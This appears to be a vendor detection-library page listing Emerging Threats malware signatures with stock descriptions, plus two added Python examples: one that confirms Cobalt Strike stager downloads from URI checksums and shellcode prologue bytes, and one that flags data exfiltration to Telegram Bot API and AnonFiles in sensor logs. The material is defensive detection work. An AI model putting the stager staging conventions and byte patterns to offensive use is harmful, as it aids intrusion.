Description

Recommendation

ET MALWARE SteamStealer Malicious SSL Certificate Detected

Description

Recommendation

MITRE ATT&CK Techniques

  • Develop Capabilities - T1587

ET MALWARE Steganographic Encoded WAV File Inbound via HTTP M1

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Steganographic Encoded WAV File Inbound via HTTP M2

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Stobox Connectivity Check

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Storm C&C with typo’d User-Agent (Windoss)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE StormKitty Data Exfil via Telegram

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE StormKitty Exfil via AnonFiles

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE StrifeWater Rat CnC Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE StrifeWater RAT CnC Activity M2

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE StrongPity APT SSL Certificate Detected

Description

Recommendation

ET MALWARE STRRAT Initial HTTP Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE STRRAT Requesting License Check

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Stuxnet index.php

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Successful Cobalt Strike Shellcode Download (x32)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M2

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.
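The three "Successful Cobalt Strike Shellcode Download" alerts above are about a completed staging transaction: a request to a stager URI answered with a 200 whose body is the beacon stager shellcode. Two things make that transaction recognisable, and an analyst confirming the alert from a captured session can check both. First, Cobalt Strike (like Metasploit) picks stager URIs whose 8-bit checksum encodes the architecture, 92 for x86 and 93 for x64. Second, the x86 and x64 stagers open with a well-known prologue (cld then call for x86, cld; and rsp,-16; call for x64). The code below is an added example, not Rapid7's or Emerging Threats' code and not the content of the rules themselves; the checksum and prologue patterns are the publicly documented conventions, the byte patterns are deliberately tolerant of the small variants seen in the wild, and the sample transaction (the path and a truncated prologue followed by padding) is constructed, not real shellcode.

```python
"""Confirm a "Successful Cobalt Strike Shellcode Download" style alert.

Added example, not Rapid7's or Emerging Threats' code and not the rule
content. It checks the two things that family of alerts combines: a stager
URI whose checksum8 selects the architecture (Cobalt Strike/Metasploit
staging convention: 92 for x86, 93 for x64) and a response body that opens
with the stager prologue. The transactions below are constructed.
"""
import re

CHECKSUM_X86 = 92
CHECKSUM_X64 = 93

# x86 stager prologue: cld ; call <api resolver> ; pushad ; mov ebp,esp ;
# xor eax/edx ; mov edx, fs:[reg+0x30] (PEB). The call displacement and the
# register choice vary between builds, so those bytes are left open.
X86_PROLOGUE = re.compile(
    rb"\xfc\xe8.\x00\x00\x00"
    rb"\x60\x89\xe5"
    rb"\x31[\xc0\xd2]\x64\x8b[\x50\x52]\x30",
    re.DOTALL)
# x64 stager prologue: cld ; and rsp,-16 ; call <api resolver>.
X64_PROLOGUE = re.compile(
    rb"\xfc\x48\x83\xe4\xf0"
    rb"\xe8.\x00\x00\x00",
    re.DOTALL)


def checksum8(uri):
    """8-bit sum of the URI path characters, leading '/' and query excluded."""
    path = uri.split("?", 1)[0].lstrip("/")
    return sum(path.encode("ascii", "ignore")) % 256


def arch_from_uri(uri):
    """'x86', 'x64' or None, from the staging checksum of the URI alone."""
    return {CHECKSUM_X86: "x86", CHECKSUM_X64: "x64"}.get(checksum8(uri))


def arch_from_body(body):
    """'x86', 'x64' or None, from the first bytes of the response body."""
    if X64_PROLOGUE.match(body):
        return "x64"
    if X86_PROLOGUE.match(body):
        return "x86"
    return None


def assess_download(method, uri, status, body):
    """Classify one HTTP transaction the way the alert family does.

    'successful_stager_download' needs a GET, a 200 and a body that starts
    with a stager prologue. A checksum-only hit is weak evidence by itself
    (about 1 in 256 random short paths match) and is reported separately so
    it can be used for scoping rather than as a verdict.
    """
    uri_arch, body_arch = arch_from_uri(uri), arch_from_body(body)
    if method == "GET" and status == 200 and body_arch:
        verdict = "successful_stager_download"
    elif uri_arch:
        verdict = "stager_uri_no_payload"
    else:
        verdict = "benign"
    return {"verdict": verdict, "uri_checksum8": checksum8(uri),
            "arch_from_uri": uri_arch, "arch_from_body": body_arch,
            "arch_agree": uri_arch is not None and uri_arch == body_arch}


# Constructed transactions: 4-character paths whose checksum8 is 92 / 93 and
# bodies holding only a prologue prefix plus NOP padding (not shellcode).
SAMPLE_X86 = ("GET", "/abc6", 200,
              b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" + b"\x90" * 16)
SAMPLE_X64 = ("GET", "/abc7", 200,
              b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00" + b"\x90" * 16)
SAMPLE_BENIGN = ("GET", "/index.html", 200, b"<html><body>hello</body></html>")

if __name__ == "__main__":
    for tx in (SAMPLE_X86, SAMPLE_X64, SAMPLE_BENIGN):
        print(tx[1], assess_download(*tx))
```

When the URI checksum and the body prologue disagree on the architecture, treat the transaction as suspicious anyway: the body match is the strong signal, the checksum only says which stager the operator intended to serve.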

ET MALWARE SunSeed Downloader Retrieving Binary (set)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE SunSeed Download Retrieving Binary

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE SunSeed Lua Downloader Activity (GET)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE SUNSHUTTLE CnC Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Supercharge Component Download (exe)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Supercharge Component Download (ps1)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE SuperFish CnC Beacon 1

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE SuperFish CnC Beacon 2

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE SuperFish Possible SSL Cert Signed By Compromised Root CA

Description

Recommendation

ET MALWARE SuperSocialat Plugin Backdoor Code Execution Attempt

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE SupremeLogger CnC Checkin

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE SUR SSL Cert APT1

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. The signature matches a TLS server certificate that has been associated with APT1 infrastructure. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question, including the server certificate and the SNI of the flagged session, and check for other internal hosts connecting to the same certificate. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected APT15/NICKEL KETRUM CnC Activity (GET)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected APT32/OceanLotus Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected APT32/Oceanlotus Maldoc CnC

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected APT LuckyMouse BlueTraveller CnC

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Ares Loader Activity (GET)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Bizarro Banker Activity (POST)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected DonotGroup Dropper Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected DonotGroup Dropper Telegram API Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.
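Several alerts in this list ("StormKitty Data Exfil via Telegram", "StormKitty Exfil via AnonFiles" and "Suspected DonotGroup Dropper Telegram API Activity") describe the same technique: the malware pushes stolen data to a public web API instead of attacker-owned infrastructure, so the destination itself looks benign. What gives it away on the wire is the request shape, in particular the Telegram Bot API path `/bot<id>:<secret>/<method>`, in which the token identifies the attacker's bot and the method (sendDocument, sendMessage) says whether data is leaving. The code below is an added example of that check, not Rapid7's or the rule author's code. It assumes EVE-style `http` and `tls` records as Suricata emits them; the host list comes from the alert names, the token regex approximates the public Telegram token format, the `request_body_len` field name is an assumption (use whatever your sensor exports for the request body size), and the records are constructed.

```python
"""Spot uploads to file-sharing / bot APIs used for data exfiltration.

Added example; not Rapid7's or the rule author's code. It assumes EVE-style
"http" and "tls" records (as in Suricata) carrying the hostname, url and
method of each request and the SNI of each TLS session. The host list comes
from the alert names; the Telegram Bot API path format (/bot<token>/<method>)
is public Telegram documentation; the records below are constructed.
"""
import json
import re

# Services named in the alerts, mapped to a short label.
EXFIL_SERVICES = {
    "api.telegram.org": "telegram-bot-api",
    "api.anonfiles.com": "anonfiles",
}

# Telegram Bot API: /bot<bot_id>:<secret>/<method>. The secret length is an
# approximation of the observed token format, not a Telegram guarantee.
TELEGRAM_BOT_PATH = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)")
# Methods that carry data out of the network, as opposed to getMe/getUpdates.
TELEGRAM_SEND_METHODS = {"sendDocument", "sendMessage", "sendPhoto", "sendVideo"}

# Constructed records: a Telegram sendDocument over plain HTTP (as the sensor
# would see it if TLS were terminated upstream), an AnonFiles upload, a TLS
# session to the Telegram API where only the SNI is visible, and benign web.
SAMPLE_EVE = r"""
{"flow_id":1,"event_type":"http","src_ip":"10.0.0.21","dest_ip":"203.0.113.50","http":{"hostname":"api.telegram.org","url":"/bot1234567890:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sendDocument","http_method":"POST","http_user_agent":"Mozilla/5.0","request_body_len":48211}}
{"flow_id":2,"event_type":"http","src_ip":"10.0.0.21","dest_ip":"203.0.113.51","http":{"hostname":"api.anonfiles.com","url":"/upload","http_method":"POST","http_user_agent":"Mozilla/5.0","request_body_len":913004}}
{"flow_id":3,"event_type":"tls","src_ip":"10.0.0.33","dest_ip":"203.0.113.50","tls":{"sni":"api.telegram.org","version":"TLS 1.3"}}
{"flow_id":4,"event_type":"http","src_ip":"10.0.0.40","dest_ip":"198.51.100.8","http":{"hostname":"www.example.org","url":"/index.html","http_method":"GET","length":5120}}
"""


def parse_eve(text):
    """Parse EVE JSON lines into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def redact_token(bot_id, secret):
    """Keep the bot id (it identifies the attacker's bot and is safe to put
    in a ticket) and mask all but the first characters of the secret."""
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


def detect_exfil(records):
    """Return one finding per request or session to an exfiltration service.

    Plain-HTTP records expose the full URL, so the Telegram method and bot
    id are extracted and the token redacted. TLS records only expose the
    SNI, so they are reported as encrypted hits with exfil=None, to be
    confirmed from endpoint telemetry (which process opened the socket).
    """
    findings = []
    for r in records:
        kind = r.get("event_type")
        if kind == "http":
            http = r["http"]
            host = http.get("hostname", "")
            if host not in EXFIL_SERVICES:
                continue
            f = {"client": r["src_ip"], "service": EXFIL_SERVICES[host],
                 "method": http.get("http_method"), "url": http.get("url", ""),
                 "bytes_out": http.get("request_body_len", 0),  # assumed field name
                 "encrypted": False, "exfil": http.get("http_method") == "POST"}
            m = TELEGRAM_BOT_PATH.match(f["url"])
            if m:
                f["bot_token"] = redact_token(m["bot_id"], m["secret"])
                f["api_method"] = m["method"]
                f["exfil"] = m["method"] in TELEGRAM_SEND_METHODS
                f["url"] = f"/bot{f['bot_token']}/{m['method']}"
            findings.append(f)
        elif kind == "tls":
            sni = r["tls"].get("sni", "")
            if sni in EXFIL_SERVICES:
                findings.append({"client": r["src_ip"], "service": EXFIL_SERVICES[sni],
                                 "encrypted": True, "exfil": None})
    return findings


if __name__ == "__main__":
    for finding in detect_exfil(parse_eve(SAMPLE_EVE)):
        print(finding)
```

The encrypted case is the common one in practice: with TLS in place the sensor sees only `api.telegram.org` in the SNI, which is also what a legitimate Telegram desktop client produces, so the network alert narrows the host and time window and the endpoint decides.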

ET MALWARE Suspected Fancy Bear (APT28) Maldoc CnC

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Gamaredon Downloader Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Glupteba Download

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Gootkit Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected HARDPULSE Request

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Kimsuky Activity (GET)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Lockscreen Ransomware Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Suspected Malicious VBS Script Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected PlugX Checkin Activity (GET)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Powershell Empire GET M1

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Powershell Empire POST M1

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Praying Mantis Threat Actor Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected PULSECHECK Webshell Access Inbound

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected REDCURL CnC Activity M1

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected REDCURL CnC Activity M2

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected SandCat Related Communication (POST)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Sidewinder Activity (GET)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Sidewinder APT Maldoc Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected SmokeLoader Retrieving Next Stage (GET)

Description

Recommendation

ET MALWARE Suspected TeamTNT Linux Miner Activity

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M1

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M1 (Outbound)

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M2

Description

This detection identifies malware-related network activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M2 (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M3 (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Tunna Proxy M4 (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected USBFERRY CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Win32/Hancitor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Zebrocy Downloader Traffic

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspected Zebrocy Implant CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious bot.exe Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious Domain (judgebryantweekes .com) in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE Suspicious Domain (lawyeryouwant .com) in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Encrypted Channel - T1573

ET MALWARE Suspicious Download Setup_ exe

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious Fake Opera 10 User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious flash_player.exe Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SUSPICIOUS UA (iexplore)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious UA Mozilla / 4.0

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent (Asteria md5)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent build - possibly Delf/Troxen/Zema

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious user-agent (f**king)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent (GenericHttp/VER_STR_COMMA)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent MyAgrent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent (Post)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious user agent (V32)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious User-Agent (WindowsNT) With No Separating Space

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Swizzor-based Downloader - Invalid User-Agent (Mozilla/4.0 (compatible MSIE 7.0 na .NET CLR 2.0.50727 .NET CLR 3.0.4506.2152 .NET CLR 3.5.30729))

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Swizzor Checkin (kgen_up)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

